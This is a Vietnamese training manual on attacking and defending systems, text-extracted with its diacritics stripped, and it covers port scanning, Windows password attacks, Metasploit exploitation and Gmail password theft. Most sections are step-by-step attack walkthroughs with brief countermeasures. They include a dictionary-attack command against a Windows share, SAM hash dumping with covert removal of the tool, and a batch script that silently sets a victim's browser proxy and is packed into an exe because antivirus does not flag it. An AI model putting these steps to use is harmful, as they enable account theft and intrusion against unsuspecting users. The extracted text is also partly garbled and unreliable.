Upload
laonap166
View
318
Download
0
Embed Size (px)
Citation preview
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Tn cng v bo v h thng
Copyright by Tocbatdat
Research Manager
I-train.com.vn
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Phn I. Scan port ton tp v cch phng chng ....................................................... 6
I. Nguyn tc truyn thng tin TCP/IP ................................................................... 6
1. Cu to gi tin TCP ......................................................................................... 6
2. Khi Client mun thc hin mt kt ni TCP vi Server u tin: ................. 7
3. Khi Client mun kt thc mt phin lm vic vi Server ............................... 8
II. Nguyn tc Scan Port trn mt h thng. .......................................................... 8
1. TCP Scan ......................................................................................................... 8
2. UDP Scan. ......................................................................................................10
III. Scan Port vi Nmap. .......................................................................................10
IV. Kt lun. ..........................................................................................................13
Phn I. Tn cng Password ca ti khon ngi dng trong Windows. .................14
I.S dng lnh For trong Windows. .....................................................................14
1. Gii m mt khu c m ho. ....................................................................16
Phn II. Tn cng h thng Windows qua l hng bo mt. ...................................23
1. Dng Retina Network Security Scanner 5.1 tm l hng trn h thng. ..24
Phn III. Hack password xc thc bng Certificate v cch phng chng .............32
I. Hiu bit chung ..................................................................................................32
II. Tools s dng ...................................................................................................35
III. K thut ly Password Gmail .........................................................................36
1. t proxy cho ngi dng .............................................................................36
2. Tit hnh ........................................................................................................37
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
I. Pht hin v bo mt cho Account Gmail .........................................................45
1. Pht hin khi vo mng c qua mt Proxy hay khng ..................................45
Phn IV. Tn cng DoS/DDoS v cch phng chng .............................................50
I. Lch s ca tn cng DoS ..................................................................................50
1. Mc tiu .........................................................................................................50
2. Cc cuc tn cng. .........................................................................................50
II. nh ngha v tn cng DoS ............................................................................51
1. Cc mc ch ca tn cng DoS ....................................................................51
2. Mc tiu m k tn cng thng s dng tn cng DoS ..............................52
III. Cc dng tn cng ...........................................................................................52
1. Cc dng tn cng DoS..................................................................................52
IV. Cc cng c tn cng DoS ..............................................................................58
1. Tools DoS Jolt2 ..........................................................................................59
2. Tools DoS: Bubonic.c ....................................................................................59
3. Tools DoS: Land and LaTierra ......................................................................60
4. Tools DoS: Targa ...........................................................................................60
5. Tools DoS Blast 2.0 .......................................................................................61
6. Tools DoS Nemesys ...................................................................................61
7. Tool DoS Panther2. ....................................................................................62
8. Tool DoS Crazy Pinger ...............................................................................62
9. Tool DoS Some Trouble .............................................................................64
10. DoS Tools UDP Flood ..............................................................................65
11. Tools DoS FSMAX ..................................................................................66
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
V. Kt lun phn I. ................................................................................................66
VI. Mng BOT NET .............................................................................................68
1. ngha ca mng BOT .................................................................................68
2. Mng BOT .....................................................................................................69
3. Mng Botnet. .................................................................................................69
4. Mc ch s dng mng Botnets ...................................................................70
5. Cc dng ca mng BOT. ..............................................................................71
6. Cc bc xy dng mng BotNet? Cch phn tch mng Bot. .....................72
7. S cch h thng b ly nhim v s dng Agobot. .................................74
VII. Cc tools tn cng DDoS ..............................................................................74
1. Nuclear Bot. ...................................................................................................74
VIII. Tn cng DDoS ............................................................................................75
1. Cc c tnh ca tn cng DDoS. ..................................................................76
2. Tn cng DDoS khng th ngn chn hon ton. .........................................76
3. K tn cng khn ngoan. ...............................................................................77
IX. Phn loi tn cng DDoS................................................................................78
X. Tn cng Reflective DNS (reflective - phn chiu). .......................................80
1. Cc vn lin quan ti tn cng Reflective DNS .......................................80
2. Tool tn cng Reflective DNS ihateperl.pl ................................................81
Phn VI. K thut edit Registry bng cu lnh v ng dng bo mt .....................83
1. Vai tr ca Command Line ...............................................................................83
2. To ra file.bat thc thi t ng mt s thao tc ................................................83
3. Cu hnh REGISTRY bng file.bat ..................................................................85
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
4. ng dng cu hnh REGISTRY .......................................................................87
5. Kt lun .............................................................................................................89
Phn VII. Backdoor v Trojan ton tp ...................................................................90
1. Gii thiu v Trojans. .......................................................................................90
2. Cc dng v cch hot ng ca Trojan ...........................................................91
3. Nhng con ng my tnh nn nhn nhim Trojan. ..................................92
4. Nhng cch nhn bit mt my tnh b nhim Trojans C bn nht C th
khng ng. ...........................................................................................................93
5. S dng mt s loi Trojan...............................................................................94
6. Cch n mt hoc nhiu Trojan vo mt file .exe hay file chy bnh thng 102
7. Cch pht hin Trojan. ....................................................................................106
8. Cch phng chng Trojans v Backdoor ........................................................110
9. Kt lun. ..........................................................................................................111
Phn VIII. K thut hack Web s dng upload file PHP v cch phng chng ...112
I. Cc tools cn thit ...........................................................................................113
1. Burpsuite_v1.3 .............................................................................................113
II. K thut upload file PHP v chim quyn iu khin my ch web ............114
1. Chun b .......................................................................................................114
2. Thc hin Upload file php ln website ........................................................114
III. K thut bo v my ch .................................................................................138
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Phn I. Scan port ton tp v cch phng chng
Trong bi vit ny ti trnh by vi cc bn cc nguyn tc Scan Port c bn trn
h thng, nhng k thut scan t chng ta bit trn mt h thng ang s dng
nhng Port no. T nhng khi nim v Scan ti cng trnh by vi cc bn gii
php ngn cm Scan trn h thng. Ni dung trong bi vit gm:
1. Nguyn tc truyn thng tin TCP/IP
2. Cc Nguyn tc v Phng thc Scan Port
3. S dng phn mm Nmap
I. Nguyn tc truyn thng tin TCP/IP
1. Cu to gi tin TCP
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Trong bi vit ny ti ch ch trng ti cc thit lp Flag trong gi tin TCP nhm
mc ch s dng Scan Port:
- Thng s SYN yu cu kt ni gia hai my tnh
- Thng s ACK tr li kt ni gia hai my c th bt u c thc hin
- Thng s FIN kt thc qu trnh kt ni gia hai my
- Thng s RST t Server ni cho Client bit rng giao tip ny b cm (khng
th s dng)
- Thng s PSH s dng kt hp vi thng s URG
- Thng s URG s dng thit lp u tin cho gi tin ny.
Tht ra ton b cc thng s ny trong gi tin n ch th hin l 1 hoc 0 nu l
0 th gi tin TCP khng thit lp thng s ny, nu l 1 th thng s no c
thc hin n s ln lt trong 8 bits trong phn Flag.
2. Khi Client mun thc hin mt kt ni TCP vi Server u tin:
+ Bc I: Client bn n Server mt gi tin SYN
+ Bc II: Server tr li ti Client mt gi tin SYN/ACK
+ Bc III: Khi Client nhn c gi tin SYN/ACK s gi li server mt gi ACK
v qu trnh trao i thng tin gia hai my bt u.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
3. Khi Client mun kt thc mt phin lm vic vi Server
+ Bc I: Client gi n Server mt gi tin FIN ACK
+ Bc II: Server gi li cho Client mt gi tin ACK
+ Bc III: Server li gi cho Client mt gi FIN ACK
+ Bc IV: Client gi li cho Server gi ACK v qu trnh ngt kt ni gia Server
v Client c thc hin.
II. Nguyn tc Scan Port trn mt h thng.
1. TCP Scan
Trn gi TCP/UDP c 16 bit dnh cho Port Number iu c ngha n c t 1
65535 port. Khng mt hacker no li scan ton b cc port trn h thng, chng
ch scan nhng port hay s dng nht thng ch s dng scan t port 1 ti port
1024 m thi.
Phn trn ca bi vit ti trnh by vi cc bn nguyn tc to kt ni v ngt
kt ni gia hai my tnh trn mng. Da vo cc nguyn tc truyn thng tin ca
TCP ti c th Scan Port no m trn h thng bng nhng phng thc sau y:
- SYN Scan: Khi Client bn gi SYN vi mt thng s Port nht nh ti Server
nu server gi v gi SYN/ACK th Client bit Port trn Server c m. Nu
Server gi v cho Client gi RST/SYN ti bit port trn Server ng.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- FIN Scan: Khi Client cha c kt ni ti Server nhng vn to ra gi FIN vi s
port nht nh gi ti Server cn Scan. Nu Server gi v gi ACK th Client bit
Server m port , nu Server gi v gi RST th Client bit Server ng port .
- NULL Scan Sure: Client s gi ti Server nhng gi TCP vi s port cn Scan
m khng cha thng s Flag no, nu Server gi li gi RST th ti bit port
trn Server b ng.
- XMAS Scan Sorry: Client s gi nhng gi TCP vi s Port nht nh cn Scan
cha nhiu thng s Flag nh: FIN, URG, PSH. Nu Server tr v gi RST ti bit
port trn Server b ng.
- TCP Connect: Phng thc ny rt thc t n gi n Server nhng gi tin yu
cu kt ni thc t ti cc port c th trn server. Nu server tr v gi SYN/ACK
th Client bit port m, nu Server gi v gi RST/ACK Client bit port trn
Server b ng.
- ACK Scan: dng Scan ny nhm mc ch tm nhng Access Controll List trn
Server. Client c gng kt ni ti Server bng gi ICMP nu nhn c gi tin l
Host Unreachable th client s hiu port trn server b lc.
C vi dng Scan cho cc dch v in hnh d b tn cng nh:
- RPC Scan: C gng kim tra xem h thng c m port cho dch v RPC khng.
- Windows Scan tng t nh ACK Scan, nhng n c th ch thc hin trn mt
s port nht nh.
- FTP Scan: C th s dng xem dch v FTP c c s dng trn Server hay
khng
- IDLE cho php kim tra tnh trng ca my ch.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
2. UDP Scan.
Nu nh gi tin truyn bng TCP m bo s ton vn ca gi tin s lun c
truyn ti ch. Gi tin truyn bng UDP s p ng nhu cu truyn ti d liu
nhanh vi cc gi tin nh. Vi qu trnh thc hin truyn tin bng TCP k tn cng
d dng Scan c h thng ang m nhng port no da trn cc thng s Flag
trn gi TCP.
Cu to gi UDP
Nh ta thy gi UDP khng cha cc thng s Flag, cho nn khng th s dng
cc phng thc Scan port ca TCP s dng cho UDP c. Tht khng may hu
ht h thng u cho php gi ICMP.
Nu mt port b ng, khi Server nhn c gi ICMP t client n s c gng gi
mt gi ICMP type 3 code 3 port vi ni dung l unreachable v Client. Khi thc
hin UDP Scan bn hy chun b tinh thn nhn c cc kt qu khng c tin
cy cao.
III. Scan Port vi Nmap.
Nmap l mt tool scan port rt mnh v ni danh t lu c gii hacker tin
dng. N h tr ton b cc phng thc scan port, ngoi ra n cn h tr cc
phng thc scan hostname, service chy trn h thng .
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Nmap hin gi c c giao din ho v giao din command line cho ngi dng,
chy trn c mi trng .NIX v Windows.
Phn mm nmap min ph cc bn download ti a ch:
http://nmap.org/download.html
Di y l cch s dng Nmap scan
C:\nmap-3.93>nmap -h
Nmap 3.93 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service and app names/versions
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
--win_help Windows-specific features
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND
EXAMPLES
Nmap Scan
a. Cc dng Scan nmap h tr.
Nmap sT: trong ch s l Scan, cn ch T l dng TCP scan
Nmap sU: l s dng UDP Scan
Nmap sP: s dng Ping scan
Nmap sF: s dng FIN Scan
Nmap sX: s dng phng thc XMAS Scan
Nmap sN: s dng phng thc NULL Scan
Nmap sV: s dng Scan tn cc ng dng v version ca n
Nmap SR /I RPC s dng scan RPC
b. Cc option cao cp kt hp vi cc dng Scan trong Nmap.
- O: s dng bit h iu hnh chy trn my ch v nh ta dng Nmap s dng
phng thc scan l XMAS Scan v on bit h iu hnh ca:
www.vnexperts.net ta dng cu lnh: nmap sX o www.vnexperts.net.
- P: gii port s dng scan
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- F: Ch nhng port trong danh sch scan ca Nmap
- V: S dng Scan hai ln nhm tng tin cy v hiu qu ca phng thc scan
no ta s dng.
- P0: khng s dng ping Scan nhm mc ch gim thiu cc qu trnh qut
ngn chn scan trn cc trang web hay my ch.
V nh ti mun Scan trang web www.vnexperts.net bng phng thc UDP Scan
s port ti s dng l t 1 ti 1024 v s dng hai ln nng cao hiu qu, khi
scan s khng ping ti trang ny:
Nmap sU P 1-1024 V P0 www.vnexperts.net
Ngoi ra nmap cn h tr tnh nng scan n nhm trnh nhng qu trnh qut trn
server nh s dng:
-Ddecoy_host1, decoy2 s n qu trnh Scan.
-6: Scan IPv6
Ngoi ra nmap cn cho chng ta nhng options output kt qu ra nhiu nh
dng file khc nhau.
IV. Kt lun.
Scan port l mt trong nhng bc u tin tn cng vo mt h thng, hiu
c cc phng thc scan chng ta c th dng nmap thc hin. Sau cch
chng ta cm Scan l s dng cc thit b chuyn dng nh IPS, IDS detect
v ngn chn tn cng
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Phn II. Hack Windows ton tp v cch phng chng
Hack Windows ton tp Cch phng chng.
Windows l h iu hnh ph bin nht trn th gii, n lun tim n nhng li
bo mt. Trong bi vit ny ti s trnh by vi cc bn nhng phng thc tn
cng mt my tnh ci h iu hnh Windows. T nhng kin thc v kh nng tn
cng vo my tnh ci h iu hnh Windows ti s a ra cc gii php bo mt
cho h thng.
Cc ni dung trong bi vit:
1. Tn cng Password ca ti khon trong Windows.
2. Tn cng my tnh ci Windows thng qua cc l hng bo mt
Phn I. Tn cng Password ca ti khon ngi dng trong Windows.
My b tn cng
Ci Windows 2003My tn cng
Switch
I.S dng lnh For trong Windows.
- My b tn cng a ch IP: 192.168.1.18, my s dng tn cng cng
nm trong mng 192.168.1.0/24.
- Hu ht tt c cc my u chia s ti nguyn trong h thng mng, v c
mt th mc c Share n mc nh l th mc \\computer\IPC$
- Khi ta bit c User trn my l Administrator ta ch quan tm lm
th no bit c mt khu ca ti khon .
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- To mt file t in cha hu ht cc mt khu thng dng dng tools
Dictionary Generator to ra b t in ny.
- Cu to ca lnh for:
- For /f tokens=1 %a in (vnedic.txt) do net use * \\computer\IPC$
/user:administrator %a
- Trong vnedic.txt l file t in c to, s dng Net User Map
File t in ti I: vi tn vnedic.txt. Sau khi h thng tm
password trong file vnedict.txt tm c password ca ti khon
Administrator ca my 192.168.1.8 l 123.
- C rt nhiu phng php to ra b t in s dng lnh for tn cng
vo h thng Windows.
- Nhc im ca phng php ny l rt chm c th tn cng c
mt h thng my tnh c mt khu phc tp.
Gii php chng tn cng s dng lnh For:
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Thit lp trong Group Policy khi g Password sai 5 ln s b lock 30 pht
1. Gii m mt khu c m ho.
a. Trn my Local
- Gi s bn khng bit mt khu ca mt my tnh trong h thng, nhng
bn li nh ngi g mt khu ca h v cho bn mn my tnh
dng tm. V bn gi y l lm th no bit c Password trn my
bn ang logon.
- Rt nhiu phn mm c th Exports on m ho ca Password ra thnh
mt File in hnh l PasswordDump, WinPasswordPro, trong bi vit
ny ti trnh by vi cc bn s dng WinPasswordPro.
Bt chng trnh WinPasswordPro ln Import Password t my Local
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Sau Khi Import Password t file SAM vo s c
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Sau ta Export danh sch User v Password c m ho ra mt file
.txt v gi vo Mail ca chng ta, sang my chng ta cng dung phn
mm ny gii m ngc li.
M file TXT exports ra ta c d liu password c m ho
Sau khi ly c d liu User Password m ho ta Uninstall chng
trnh ny trn my nn nhn khi l - ri gi file vo Mail v
my ca ta Gii m y l cng on tn thi gian. i vi mt khu
di 10 k t mt khong 1 ting.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Bt chng trnh WinPasswordPro trn my ca chng ta chn File ->
Import PWDUMP file ri chn ng dn ti file password c m
ho.
Sau khi Import t file PWDUMP ta c - Nhn vo Start ta s c 3
phng thc tn cng Password
+ Brute Force
+ Dictionary
+ Smart Table
Ti chn phng thc tn cng Brute Force
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
i khong 15 pht (y l password do ti khng t k t c bit, khng
s, khng hoa v 9 k t)
- Kt thc qu trnh ti gii m c file Password c m ho vi:
user administrator v Password l vnexperts
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
b. Tn cng my t xa.
- Khi chng ta c ngi trn my nn nhn Exports Password c m
ho l n gin nhng thc t s rt t khi thc hin c phng thc
ny.
- Dng Password Dump chng ta s ly c d liu c m ho t
mt my t xa.
- y ti dng PasswordDump Version 6.1.6
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
trn ti s ly d liu m ho Username v Password t my tnh
192.168.1.156 dung PWDump v out d liu ra file: vnehack.txt ti
C: dng lnh Type xem d li ca file .
Sau Khi c d liu ny ta li s dng WinPasswordPro gii m. V
sau khi ta c ti khon User Administrator v Password ca n th vic
lm g l tu thuc vo chng ta.
- Gii php phng chng hnh thc tn cng ny:
+ phng nhng ngi truy cp vo my tnh ca chng ta.
+ t Password di trn 14 k t v c y cc k t: c bit, hoa,
s, thng
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
+ Enable Firewall ln chng PasswordDUMP, Ci t v cp nht cc
bn v li mi nht t nh sn xut
+ Ci t ti thiu mt chng trnh dit Virus mnh.
V hiu ho PWdump nhng lu khi k tn cng c mt ti khon
trong h thng th li hon ton khc chng s vt qua hu ht cc
phng chng bo mt: trong trng hp ny ti c mt User bnh thng
vi tn vne ti c th Exports ton b d liu Username Password c
m ho my ch.
Phn II. Tn cng h thng Windows qua l hng bo mt.
- u tin chng ta phi tm nhng l hng bo mt.
- Khai thc l hng tm c
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
1. Dng Retina Network Security Scanner 5.1 tm l hng trn h thng.
Bt chng trnh Retina Network Security Scanner ln:
Chng ta mun tm kim trong h thng mng nhng my no ang Online vo
phn Discover
pht hin ra l hng bo mt s dng Tab Audit
Ti s s dng chng trnh ny kim tra my 192.168.1.8
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Nhn Start - Chn Scan Template l ch Complete Scan:
i mt nt ti c kt qu tht bt ng: my tnh 192.168.1.8 b rt nhiu l
hng bo mt
- Ti pht hin ra li nguy him trn my cha c Fix trn Service RPC
l: Windows RPC DCOM Multiple Vulerabilities.
- c thm phn m rng v li ny ti pht hin ra li ny cho php ta
truy cp bt hp php ti my tnh .
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Retina Network Security Scanner l phn mm rt hiu qu Scan h thng v
pht hin ra cc l hng bo mt y l phn mm c bn quyn.
1. S dng Metasploit khai thc.
- Nhng l hng va c Retina pht hin gi chng ta s s dng
Metasploit khai thc chng, y ti dung bn metasploit 2.7 - Hin
nay c bn 3.0
Sau khi ci t MetaSploit ti bt giao din Web bng cch di y:
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Sau bt MSFWeb ti vo IE g a ch: http://127.0.0.1:55555
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- La trn trong Filter Modules l Windows 2003
Trong nhng li tm thy v c th khai thc bi MetaSploit trn
Windows 2003 ti tm thy li RPC Service
Nhn vo l hng bo mt ny
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Chng trnh thong bo l hng bo mt ny s c khai thc trn cc
h iu hnh NT, 2K, XP, v 2K3
Nhn vo h thng s cho php chng ta s dng cc chng trnh
di y khai thc vo l hng bo mt ny
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Ti la chn Win32_Reverse_vncinject
Sauk hi ti la chn s dng vncinject ti la chn my ch cn Sploit
l: 192.168.1.8
Nhn Exploit khai thc l hng bo mt trn
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Kt qu tht tuyt vi ti Remote Desktop n my m khng cn
thong qua bt c phng thc xc thc no, v gi ti ton quyn vi
my tnh ny.
Mt kt qu lm au u cc nh bo mt nhng chng ta khng phi
khng c gii php phng chng.
- Cch phng chng cc li bo mt l:
+ Lun update cc bn v li mi nht t nh sn xut
+ Enable Firewall ch m nhng cng cn thit cho cc ng dng
+ C thit b IDS pht hin xm nhp
+ C Firewall chng Scan cc Service ang chy.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Phn III. Hack password xc thc bng Certificate v cch phng chng
Trong bi vit ny ti s trnh by vi cc bn k thut Hack Password ca s dng
Certificate m ha nh gmail.com hay cc trang web khc xc thc mt cch
tng t (SSL Certificate HTTPS). i vi nguy c bn c th b l Password
Gmail, trong bi vit ny ti s trnh by cch nhn bit v ngn chn nguy c ny.
I. Hiu bit chung
- Gmail hay nhng dch v web khc thng s dng HTTPS m
ha gi tin User/Pass. Khi trnh duyt web s dng Certificate ca
Gmail cung cp v m ha th gi tin User/Pass khi i trn mng s an
ton mc (gn nh tuyt i).
- K h y l th no m li c th Hack c pass ca nhng
phng thc xc thc v m ha c tnh bo mt cao.
Qu trnh xc thc bnh thng khi ngi dng truy cp Gmail:
Bc 1: Ngi dng truy cp gmail.com
Bc 2: Gmail s gi thng tin ti Versign ly Certificate
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Bc 3: Versign gi li cho Gmail Certificate bao gm: Public Key v
Private key
Bc 4: Gmail gi li cho ngi dng Public Key m ha thng tin
xc thc
Bc 5: Ngi dng s dng Public Key m ha gi ln Gmail
Bc 6: Gmail s dng Private key gii m
*note: gi tin m ha user/pass ngi dng gi ln gmail c m ha
bng public key th ch c private key mi gii m dc. Trong khi
Private key c Gmail d li v khng truyn trn mng. Nn gi tin
ny cc k bo mt v khng c kh nng gii m
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
K thut gi mo Certifcate
Ngi dng vo Gmail s khng i thng m i qua mt Intercepting
Proxy v b gi mo Certificate
Bc 1: Ngi dng vo Gmail
Bc 2: Khi gi tin t ngi dng vo Intercept proxy n s chnh sa
thng tin v gi ln Gmail
Bc 3: Gmail gi yu cu ln Versign sinh Certificate
Bc 4: Verisign gi Certificate v cho Gmail. Gmail d li Private key
v gi cho ngi yu cu Public key
Bc 5: Gmail gi Public key cho Intercept Proxy, Key ny s khng
c gi cho ngi dng
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Bc 6: Intercept Proxy t ra mt cp key v gi Public key v cho
ngi dng
Bc 7: ngi dng s dng Public Key gi ny do Proxy sinh ra m
ha user/pass v gi ln cho proxy. Proxy do t sinh ra cp key nn s c
Private key gii m.
Bc 8: Sau khi gii m c gi tin ngi dng truyn ln Proxy s s
dng Public Key ca Gmail gi cho ri m ha gi ln gmail v qu
trnh xc thc vn dc thc hin
*Note: Khi nu k tn cng ng trn con Intercept Proxy th hon
ton c th bit c User/Pass ca ngi dng. Ngi dng khng ch
khi i qua mt Intercept proxy th user/pass hon ton c th b l, mc
d s dng cc phng thc xc thc rt bo mt
II. Tools s dng
- Burpsuite_v1.3
Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip
y l mt tools c tnh nng l mt Intercept Proxy
- Java (Burpsuite l file .jar chy trn nn Java)
Link download: http://sun.com
- IE, Firefox
- Tools thit lp Proxy bng mt file
y l tools ti t vit dng file .bat hoc cc bn c th chuyn
file.bat sang file.exe khi ngi dng kch vo file ny s t ng
thit lp Proxy
- Quick_Batch_File_Compiler_3.21 l mt tools chuyn file.bat
file.exe
http://www.portswigger.net/suite/burpsuite_v1.3.ziphttp://sun.com/
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
III. K thut ly Password Gmail
- Cch thng thng nht l s dng Keylogger nhng cch ny khng
s dng c khi c cc chng trnh dit virus mnh.
- Export thng tin t trnh duyt web nh IE, Firefox. Cch ny khng
thc hin c khi ngi dng khng lu User/Pass trn trnh duyt
- Cn mt cch l gi mo Certificate v s dng Intercept Proxy
1. t proxy cho ngi dng
- ton b ni dung ngi dng truy cp web i qua Intercept Proxy
th cn phi thit lp proxy trn trnh duyt ca ngi dngj
- Cch thit lp c th bn thit lp bng tay (bng mt cch no c
quyn iu khin my tnh ca nn nhn)
- Hng ngi dng chy mt file.exe m do chng ta vit thit lp
proxy
********
To ra mt file.bat vi ni dung:
echo Windows Registry Editor Version 5.00 > 1
echo
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
entVersion\Internet Settings] >2
echo "MigrateProxy"=dword:00000001 > 3
echo "ProxyEnable"=dword:00000001 > 4
echo "ProxyHttp1.1"=dword:00000000 > 5
echo "ProxyServer"="IP:port" > 6
echo "ProxyOverride"="" > 7
copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg
del 1 /f /q
del 2 /f /q
del 3 /f /q
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
del 4 /f /q
del 5 /f /q
del 6 /f /q
del 7 /f /q
regedit.exe /s b.reg
del b.reg /f /q
********
Sau dng tools Quick_Batch_File_Compiler_3.21 chuyn file.bat
ny sang file.exe
- Khi ngi dng nhn vo file ny s t ng thit lp proxy cho IE
vi IP bn thay bng IP bn cn thit lp, Port l port ca Proxy s
dng. iu rt hay l file ny tt c cc chng trnh dit virus u
khng coi l Virus
- Trong bi vit ny ti s dng mt my tnh nn proxy ti thit lp
trn trnh duyt l 127.0.0.1
2. Tit hnh
Bc 1: Ci t Java
Bc 2: Chy Burpsuite
Bc 3: Thit lp Proxy
Bc 4: Truy cp Gmail
Bc 5: Vo Proxy xem thng tin User/Pass
Bc 1: Ci t Java
- Sau khi bn download b ci Java t trang sun.com bn ci t
chun b mi trng cho cc chng trnh chy trn mi trng Java
Bc 2: Chy Burpsuite
- Sau khi download Burpsuite tin hnh gii nn khi n file .jar th
dng li
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Chy chng trnh Burpsuite_v1.3 lm Intercepting Proxy. Nhn
p vo file .jar gii nn t b download c
Chy chng trnh Burpsuite
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Mc nh chng trnh ny ch lm proxy cho chnh my chy chng trnh, cc
my khc c th s dng chng trnh ny lm proxy phi Vo tab proxy
chn Options ri c th Edit ty bin port s dng (mc nh l 8080) b du
check box loopback ony
Chuyn sang tab Intercept cu hnh cc mode hot ng ca
Intercepting proxy
- Ch Intercept on: y l ch hot ng. Nu mt ngi t my
tnh ny lm proxy th ton b qu trnh truy cp ra internet u b
proxy ny qun l. Khi mt request t trnh duyt ti Proxy, n s
pht hin ni dung c th chnh sa v forward i th mi ti my ch
web
- Chng ta tt ch ny bng cch nhn vo Intercept on s thnh off.
Mc ch khi ngi dng s dng phn mm ny lm proxy th vn c
th vo Internet bnh thng. ch ny ch lu li cc thng
tin ngi dng truy cp
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
web
Bc 3: t Proxy
- Vo IE chnh proxy vo a ch 127.0.0.1 port 8080. IE IE options
tab connection nhn vo nt LAN Settings
- Hoc chy file.bat vi ni dung nh trn
- Dng tools chuyn file.bat file.exe ri chy file.exe ny cng c
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Bc 4: Vo Gmail qua IE ( thit lp Proxy)
Truy cp vo Gmail s thy thng bo Certificate li nhn continue
tip tc
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Tip tc google s thng bo Certificate Error bn vn g
Username password truy cp vo Mail
Ti vo c mail vn cn thng bo Certificate Error
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Bc 5: Vo Proxy tm thng tin Username v Pass
- Vo Burpsuite Chuyn sang tab Target Chn Site Map
- La chn trang web https://www.google.com Vo mc Accounts
Vo mc ServiceLoginAuth Nhn chuyn sang bn phi chn
Request (thng tin gi ln server) vo mc Raw chng ta s thy
thng tin Username v Passwor
https://www.google.com/
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
I. Pht hin v bo mt cho Account Gmail
Mun hack password gmail k tn cng phi hng ngi dng t
Proxy i qua mt Intercept Proxy sau gi mo Certificate do mun
pht hin v bo mt cho Account Gmail bn c th thc hin bng cc
cch:
1. Pht hin khi vo mng c qua mt Proxy hay khng
Kim tra bng cch trc khi vo Internet truy cp vo mc thit lp
Proxy xem c a ch no c thit lp hay cha.
Cch ny rt hu ch nhng xem ra c phn rm r kh thc hin v d
b qun hay b qua
1. Pht hin Certificate b gi mo
a. Khi truy cp bnh thng
+ Vo Gmail s khng bt ra nhng pop-up xut download
Certificate
+ Nhn chut vo biu tng cc kha view Certifcate s thy n
c sinh ra t Verisign
Copyright by Tocbatdat Research manager I-train.com.vn
